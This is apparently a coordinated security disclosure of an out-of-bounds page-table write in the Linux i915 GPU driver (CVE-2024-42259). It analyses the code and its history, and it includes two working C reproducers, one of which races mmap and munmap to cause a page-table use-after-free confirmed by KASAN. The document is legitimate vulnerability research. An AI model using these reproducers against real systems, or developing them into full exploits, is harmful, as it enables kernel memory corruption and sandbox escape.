I found a bug in the i915 code that allows a process with access to a render
node (/dev/dri/renderD128) to corrupt kernel memory.
This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2024-08-28.
Summary
vm_fault_gtt() calls remap_io_mapping() with an incorrect size; it should limit
the size to area->vm_end - {address passed to remap_io_mapping()} instead of
area->vm_end - area->vm_start.
Bug description
[For people reading this bug report who are not i915 experts: I highly recommend
first reading sima's "i915/GEM Crashcourse" at
https://blog.ffwll.ch/2013/01/i915gem-crashcourse-overview.html. I wouldn't
have understood what's going on in this code without reading that.]
I found a bug in vm_fault_gtt() in drivers/gpu/drm/i915/gem/i915_gem_mman.c.
PTEs pointing into the GTT MMIO window are written as follows:
  /* Now pin it into the GTT as needed */
  vma = i915_gem_object_ggtt_pin_ww(obj, &ww, NULL, 0, 0,
                                    PIN_MAPPABLE |
                                    PIN_NONBLOCK /* NOWARN */ |
                                    PIN_NOEVICT);
  if (IS_ERR(vma) && vma != ERR_PTR(-EDEADLK)) {
    /* Use a partial view if it is bigger than available space */
    struct i915_gtt_view view =
      compute_partial_view(obj, page_offset, MIN_CHUNK_PAGES);
    [...]
    vma = i915_gem_object_ggtt_pin_ww(obj, &ww, &view, 0, 0, flags);
    [...]
  }
  [...]
  /* Finally, remap it using the new GTT offset */
  ret = remap_io_mapping(area,
                         area->vm_start + (vma->gtt_view.partial.offset << PAGE_SHIFT),
                         (ggtt->gmadr.start + i915_ggtt_offset(vma)) >> PAGE_SHIFT,
                         min_t(u64, vma->size, area->vm_end - area->vm_start),
                         &ggtt->iomap);
In the case where the first i915_gem_object_ggtt_pin_ww() call refuses to
map the whole object into the GTT MMIO window, for example because the
object is too big to fit into the window, a subrange of the object is mapped
instead. When this happens and the subrange is not at the start of the VMA,
vma->gtt_view.partial.offset is nonzero.
In this case, the size parameter passed to remap_io_mapping() is calculated
incorrectly: it is limited to the size of the VMA (area->vm_end - area->vm_start),
but the start address is higher than where the VMA starts
(area->vm_start + (vma->gtt_view.partial.offset << PAGE_SHIFT)), so the
end address is only limited to
area->vm_end + (vma->gtt_view.partial.offset << PAGE_SHIFT).
When the VMA covers the whole object, this has no bad consequences because of
the min_t(); but if the VMA is shorter than the object, PTEs can be written
out of bounds.
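To make the arithmetic concrete, here is a small userspace model of the two clamps. It is only a sketch: buggy_end() mirrors the min_t() expression quoted above, while fixed_end() is one possible way to apply the limit suggested in the summary and is not necessarily what an upstream fix would look like. The function names and the example numbers are made up for illustration.

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_SHIFT 12

/* Smaller of two 64-bit values, standing in for the kernel's min_t(u64, ...). */
static uint64_t min_u64(uint64_t a, uint64_t b)
{
	return a < b ? a : b;
}

/*
 * End address of the range handed to remap_io_mapping() by the quoted code.
 * partial_offset is in pages, view_size is in bytes (vma->size in the driver).
 */
static uint64_t buggy_end(uint64_t vm_start, uint64_t vm_end,
			  uint64_t partial_offset, uint64_t view_size)
{
	uint64_t addr = vm_start + (partial_offset << PAGE_SHIFT);

	/* The size is clamped to the VMA length, ignoring that addr > vm_start. */
	return addr + min_u64(view_size, vm_end - vm_start);
}

/*
 * Hypothetical corrected variant: clamp the size to the space that is left
 * between the remap start address and the end of the VMA.
 */
static uint64_t fixed_end(uint64_t vm_start, uint64_t vm_end,
			  uint64_t partial_offset, uint64_t view_size)
{
	uint64_t addr = vm_start + (partial_offset << PAGE_SHIFT);

	assert(addr < vm_end); /* this model assumes the view starts inside the VMA */
	return addr + min_u64(view_size, vm_end - addr);
}
```

For a VMA of 0x7f80000 bytes at 0x10000000 and a 1 MiB view at page offset 0x7f00, buggy_end() returns 0x18000000, which is 0x80000 bytes past vm_end, while fixed_end() returns vm_end itself. With a zero partial offset the two functions agree.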
This can be tested with the following reproducer; on my system it causes
"BUG: Bad page map" and "BUG: Bad rss-counter" errors when the reproducer
tries to exit:
// written for a device with Xe Graphics (TGL GT2)
#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <stdio.h>
#include <inttypes.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <drm/i915_drm.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

#define MiB *(1024*1024)

void poke(volatile char *p) {
  printf("poking %p\n", p);
  *p = 1;
}

int main(void) {
  int fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR));

  struct drm_i915_gem_create gem_create = {
    .size = 257 MiB /* a bit over half the GGTT aperture size on my machine */
  };
  SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_CREATE, &gem_create));
  printf("created GEM 0x%x\n", gem_create.handle);

  struct drm_i915_gem_mmap_offset mmap_offset_arg = {
    .handle = gem_create.handle,
    .flags = I915_MMAP_OFFSET_GTT
  };
  SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_MMAP_OFFSET, &mmap_offset_arg));
  printf("fake mmap offset: 0x%lx\n", (unsigned long)mmap_offset_arg.offset);

#define MAP_SIZE (128 MiB - 0x80000)
  volatile char *map = (volatile char *)SYSCHK(mmap(NULL, MAP_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED, fd, mmap_offset_arg.offset));
  printf("mapped from %p\n", map);
  poke(map + MAP_SIZE - 0x1000);
  poke(map);
  printf("mapped to %p\n", map + MAP_SIZE);
}
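The reproducer's MAP_SIZE can be sanity-checked with a short calculation. The sketch below assumes that the partial view is a 1 MiB chunk (256 pages) whose start is rounded down to a chunk boundary; that chunk size is an assumption for illustration and is not stated in this report. The helper names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_SHIFT 12
#define MIB (1024ULL * 1024ULL)
#define MAP_SIZE (128 * MIB - 0x80000)   /* same value as in the reproducer */
#define CHUNK_PAGES (MIB >> PAGE_SHIFT)  /* assumed partial view size: 256 pages */

/* Page offset at which the assumed partial view for a fault starts. */
static uint64_t partial_view_start(uint64_t fault_offset)
{
	uint64_t page = fault_offset >> PAGE_SHIFT;

	return page - page % CHUNK_PAGES; /* round down to a chunk boundary */
}

/* Bytes by which the remapped range runs past the end of the mapping. */
static uint64_t overshoot(uint64_t fault_offset)
{
	uint64_t start, end;

	assert(fault_offset < MAP_SIZE); /* faults only happen inside the mapping */
	start = partial_view_start(fault_offset) << PAGE_SHIFT;
	/* The chunk is smaller than MAP_SIZE, so the buggy clamp leaves it as-is. */
	end = start + (CHUNK_PAGES << PAGE_SHIFT);
	return end > MAP_SIZE ? end - MAP_SIZE : 0;
}
```

Under these assumptions, the first poke() at offset MAP_SIZE - 0x1000 yields a view starting at page 0x7f00 and an overshoot of 0x80000 bytes (128 pages), which is exactly the amount subtracted from 128 MiB in MAP_SIZE. A fault at offset 0 stays in bounds.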
Code history
The current form of the buggy code is from commit c58305af1835 ("drm/i915: Use
remap_io_mapping() to prefault all PTE in a single pass", landed in v4.9), but
I think it was unreachable back then because the code for constructing a partial
view limited the partial view's size based on the VMA bounds:
  view.params.partial.size =
    min_t(unsigned int, chunk_size,
          (area->vm_end - area->vm_start) / PAGE_SIZE -
          view.params.partial.offset);
This safety check was removed in commit 8201c1fad4f4 ("drm/i915: Clip the
partial view against the object not vma", first in v4.11). I suspect the bug
became hittable after that point.
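The difference between the two clipping strategies can be illustrated with a small model. This is a sketch only: the post-v4.11 expression is inferred from the commit title, and the function names, the 256-page chunk, and the example numbers are assumptions chosen for illustration. All values are in pages.

```c
#include <assert.h>
#include <stdint.h>

/* Smaller of two 64-bit values. */
static uint64_t min_u64(uint64_t a, uint64_t b)
{
	return a < b ? a : b;
}

/* Older behavior: the partial view is clipped against the VMA length. */
static uint64_t clip_against_vma(uint64_t chunk, uint64_t vma_pages,
				 uint64_t offset)
{
	assert(offset <= vma_pages);
	return min_u64(chunk, vma_pages - offset);
}

/* Newer behavior (as inferred): the view is clipped against the object size. */
static uint64_t clip_against_object(uint64_t chunk, uint64_t obj_pages,
				    uint64_t offset)
{
	assert(offset <= obj_pages);
	return min_u64(chunk, obj_pages - offset);
}
```

For a 0x7f80-page VMA over a 257 MiB object (65792 pages) and a view starting at page 0x7f00, clip_against_vma() yields 0x80 pages, which ends exactly at the VMA boundary, whereas clip_against_object() yields the full 256 pages and leaves the later min_t() in vm_fault_gtt() as the only remaining limit.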
Most places in the kernel that install PFNMAP PTEs use helpers like
remap_pfn_range() that make sure the passed range fits into the specified VMA;
but it looks like i915 doesn't use those because it wants to be able to clobber
existing PTEs, which the usual helpers treat as an error.
(See commit 0e4fe0c9f2f9 ("Revert "i915: use io_mapping_map_user"").)
i915 instead uses its own helper remap_io_mapping(), which just writes PTEs
in the specified virtual address range.
Exploitability
One consequence of this bug is that, because PFNMAP PTEs are written outside the
region covered by the VMA, the MM subsystem can't shoot them down when the
driver wants to revoke userspace's access to the region. So this could probably
be used to gain access to memory that is later mapped into the GTT in the MMIO
window - but I don't know enough about i915 to tell whether that is bad or
whether shaders always have access to all GTT memory anyway.
Probably another consequence would be that if you had a VMA at the end of the
userspace virtual address space, you could get memory mapped into the kernel
half of the address space? But that probably wouldn't lead to anything overly
bad...
The one way I know of to turn this bug into something that is definitely bad
is to turn it into page table UAF, like in
https://crbug.com/project-zero/2350:
When you're only holding the mmap_lock in read mode (like in a page fault
handler), page tables that are not needed by any VMA can be freed concurrently.
So if we have one GTT-backed VMA directly ahead of a second VMA, and then
concurrently trigger a fault in the GTT-backed VMA while unmapping the second
VMA, the out-of-bounds page table access off of the first VMA can walk page
tables that are concurrently freed.
I tested this in a v6.9.2 kernel build with CONFIG_KASAN=y (for detecting UAF
access) and CONFIG_RCU_STRICT_GRACE_PERIOD=y (a debugging option that makes RCU
grace periods much shorter at the expense of performance, which makes it easier
to detect use-after-free bugs for objects that are RCU-freed), using the
following reproducer, running on a system with Xe Graphics (TGL GT2):
// written for a device with Xe Graphics (TGL GT2)
#define _GNU_SOURCE
#include <pthread.h>
#include <err.h>
#include <fcntl.h>
#include <stdio.h>
#include <inttypes.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <drm/i915_drm.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

#define MiB *(1024*1024)

// virtual address at the boundary between PGD entries
#define PGD_BOUNDARY_ADDR 0x8000000000
#define MAP_SIZE (128 MiB - 0x80000)
#define LEFT_MAPPING_ADDR (PGD_BOUNDARY_ADDR - MAP_SIZE)
#define FLIPPER_MAP_SIZE 0x200000

static void *flipper_thread_fn(void *dummy) {
  int fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR));

  struct drm_i915_gem_create gem_create = {
    .size = FLIPPER_MAP_SIZE
  };
  SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_CREATE, &gem_create));
  printf("flipper created GEM 0x%x\n", gem_create.handle);

  struct drm_i915_gem_mmap_offset mmap_offset_arg = {
    .handle = gem_create.handle,
    .flags = I915_MMAP_OFFSET_GTT
  };
  SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_MMAP_OFFSET, &mmap_offset_arg));
  printf("flipper fake mmap offset: 0x%lx\n", (unsigned long)mmap_offset_arg.offset);

  while (1) {
    SYSCHK(mmap((void*)PGD_BOUNDARY_ADDR, FLIPPER_MAP_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED_NOREPLACE, fd, mmap_offset_arg.offset));
    SYSCHK(munmap((void*)PGD_BOUNDARY_ADDR, FLIPPER_MAP_SIZE));
  }
  return NULL;
}

int main(void) {
  pthread_t flipper_thread;
  if (pthread_create(&flipper_thread, NULL, flipper_thread_fn, NULL))
    errx(1, "pthread_create");

  int fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR));

  struct drm_i915_gem_create gem_create = {
    .size = 257 MiB /* a bit over half the GGTT aperture size on my machine */
  };
  SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_CREATE, &gem_create));
  printf("created GEM 0x%x\n", gem_create.handle);

  struct drm_i915_gem_mmap_offset mmap_offset_arg = {
    .handle = gem_create.handle,
    .flags = I915_MMAP_OFFSET_GTT
  };
  SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_MMAP_OFFSET, &mmap_offset_arg));
  printf("fake mmap offset: 0x%lx\n", (unsigned long)mmap_offset_arg.offset);

  while (1) {
    SYSCHK(mmap((void*)LEFT_MAPPING_ADDR, MAP_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED_NOREPLACE, fd, mmap_offset_arg.offset));
    *(volatile char *)(PGD_BOUNDARY_ADDR - 0x1000);
    SYSCHK(munmap((void*)LEFT_MAPPING_ADDR, MAP_SIZE));
  }
}
With that, I quickly got a KASAN splat (guess unwind lines removed):
[ 906.394685] Huh VM_FAULT_OOM leaked out to the #PF handler. Retrying PF
[ 906.657887] Huh VM_FAULT_OOM leaked out to the #PF handler. Retrying PF
[ 906.819808] ==================================================================
[ 906.819819] BUG: KASAN: use-after-free in pmd_install (./arch/x86/include/asm/pgtable_types.h:401 ./arch/x86/include/asm/pgtable.h:1024 mm/memory.c:416)
[ 906.819827] Read of size 8 at addr ffff888180919000 by task linux-i915-oob-/3809
[ 906.819832] CPU: 3 PID: 3809 Comm: linux-i915-oob- Not tainted 6.9.2 #3
[ 906.819835] Hardware name: [...]
[ 906.819838] Call Trace:
[ 906.819839] <TASK>
[ 906.819841] dump_stack_lvl (lib/dump_stack.c:117 (discriminator 1))
[ 906.819847] print_report (mm/kasan/report.c:378 mm/kasan/report.c:488)
[ 906.819859] kasan_report (mm/kasan/report.c:603)
[ 906.819865] pmd_install (./arch/x86/include/asm/pgtable_types.h:401 ./arch/x86/include/asm/pgtable.h:1024 mm/memory.c:416)
[ 906.819869] __pte_alloc (mm/memory.c:445)
[ 906.819886] __apply_to_page_range (mm/memory.c:2728 mm/memory.c:2788 mm/memory.c:2824 mm/memory.c:2860 mm/memory.c:2894)
[ 906.819893] remap_io_mapping (drivers/gpu/drm/i915/i915_mm.c:110)
[ 906.819905] vm_fault_gtt (drivers/gpu/drm/i915/gem/i915_gem_mman.c:411)
[ 906.819924] __do_fault (mm/memory.c:4531)
[ 906.819927] do_fault (mm/memory.c:4894 mm/memory.c:5024)
[ 906.819931] __handle_mm_fault (mm/memory.c:3880 mm/memory.c:5300 mm/memory.c:5441)
[ 906.819948] handle_mm_fault (mm/memory.c:5466 mm/memory.c:5622)
[ 906.819951] do_user_addr_fault (arch/x86/mm/fault.c:1384)
[ 906.819959] exc_page_fault (./arch/x86/include/asm/irqflags.h:37 ./arch/x86/include/asm/irqflags.h:72 arch/x86/mm/fault.c:1482 arch/x86/mm/fault.c:1532)
[ 906.819963] asm_exc_page_fault (./arch/x86/include/asm/idtentry.h:623)
[ 906.819967] RIP: 0033:0x561a370af516
[ 906.819970] Code: 48 83 7d e8 ff 75 19 48 8d 05 26 0d 00 00 48 89 c6 bf 01 00 00 00 b8 00 00 00 00 e8 64 fb ff ff 48 b8 00 f0 ff ff 7f 00 00 00 <0f> b6 00 be 00 00 f8 07 48 b8 00 00 08 f8 7f 00 00 00 48 89 c7 e8
All code
========
0: 48 83 7d e8 ff cmpq $0xffffffffffffffff,-0x18(%rbp)
5: 75 19 jne 0x20
7: 48 8d 05 26 0d 00 00 lea 0xd26(%rip),%rax # 0xd34
e: 48 89 c6 mov %rax,%rsi
11: bf 01 00 00 00 mov $0x1,%edi
16: b8 00 00 00 00 mov $0x0,%eax
1b: e8 64 fb ff ff call 0xfffffffffffffb84
20: 48 b8 00 f0 ff ff 7f movabs $0x7ffffff000,%rax
27: 00 00 00
2a:* 0f b6 00 movzbl (%rax),%eax <-- trapping instruction
2d: be 00 00 f8 07 mov $0x7f80000,%esi
32: 48 b8 00 00 08 f8 7f movabs $0x7ff8080000,%rax
39: 00 00 00
3c: 48 89 c7 mov %rax,%rdi
3f: e8 .byte 0xe8
Code starting with the faulting instruction
===========================================
0: 0f b6 00 movzbl (%rax),%eax
3: be 00 00 f8 07 mov $0x7f80000,%esi
8: 48 b8 00 00 08 f8 7f movabs $0x7ff8080000,%rax
f: 00 00 00
12: 48 89 c7 mov %rax,%rdi
15: e8 .byte 0xe8
[ 906.819973] RSP: 002b:00007ffdd0b75430 EFLAGS: 00010213
[ 906.819976] RAX: 0000007ffffff000 RBX: 00007ffdd0b755a8 RCX: 00007f8a3a3848a3
[ 906.819978] RDX: 0000000000000003 RSI: 0000000007f80000 RDI: 0000007ff8080000
[ 906.819980] RBP: 00007ffdd0b75490 R08: 0000000000000003 R09: 0000000135188000
[ 906.819982] R10: 0000000000100001 R11: 0000000000000246 R12: 0000000000000000
[ 906.819984] R13: 00007ffdd0b755b8 R14: 0000561a370b1dd8 R15: 00007f8a3a4b9020
[ 906.819987] </TASK>
[ 906.819990] The buggy address belongs to the physical page:
[ 906.819992] page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x180919
[ 906.819994] flags: 0x4000000000000000(zone=1)
[ 906.819997] page_type: 0xffffffff()
[ 906.820000] raw: 4000000000000000 ffffea0006024688 ffffea0006024788 0000000000000000
[ 906.820002] raw: 0000000000000000 0000000000000001 00000000ffffffff 0000000000000000
[ 906.820004] page dumped because: kasan: bad access detected
[ 906.820006] Memory state around the buggy address:
[ 906.820008] ffff888180918f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 906.820010] ffff888180918f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 906.820011] >ffff888180919000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
[ 906.820013] ^
[ 906.820014] ffff888180919080: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
[ 906.820016] ffff888180919100: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
[ 906.820017] ==================================================================
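The addresses in the register dump can be cross-checked against the second reproducer's constants. The following sketch recomputes them at compile time. It assumes x86-64 with 4-level paging, where each top-level (PGD) entry covers 1 << 39 bytes; that shift value and the helper name pgd_index_of() are assumptions for illustration.

```c
#include <assert.h>
#include <stdint.h>

#define MIB (1024ULL * 1024ULL)
#define PGD_BOUNDARY_ADDR 0x8000000000ULL
#define MAP_SIZE (128 * MIB - 0x80000)
#define LEFT_MAPPING_ADDR (PGD_BOUNDARY_ADDR - MAP_SIZE)
#define PGDIR_SHIFT 39 /* assumed: x86-64 with 4-level paging */

/* Values seen in the register dump of the faulting task. */
static_assert(PGD_BOUNDARY_ADDR - 0x1000 == 0x7ffffff000ULL, "RAX: faulting address");
static_assert(MAP_SIZE == 0x7f80000ULL, "RSI: length passed to munmap()");
static_assert(LEFT_MAPPING_ADDR == 0x7ff8080000ULL, "RDI: address passed to munmap()");

/* Index of the top-level page table entry that covers addr. */
static uint64_t pgd_index_of(uint64_t addr)
{
	return (addr >> PGDIR_SHIFT) & 511;
}
```

Under that paging assumption, the faulting access at PGD_BOUNDARY_ADDR - 0x1000 falls into top-level entry 0, while the flipper thread's mapping at PGD_BOUNDARY_ADDR begins in entry 1, so the out-of-bounds part of the remapped range has to walk page tables that belong to the other mapping.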
This bug is probably not very interesting on Linux servers, since access to
the render node is typically only granted to UIDs who have locally signed in
to a machine; but it is probably relevant for things like ChromeOS, and maybe
also for escaping from some types of sandboxed desktop applications?
Related CVE Number: CVE-2024-42259.
Found by: jannh@google.com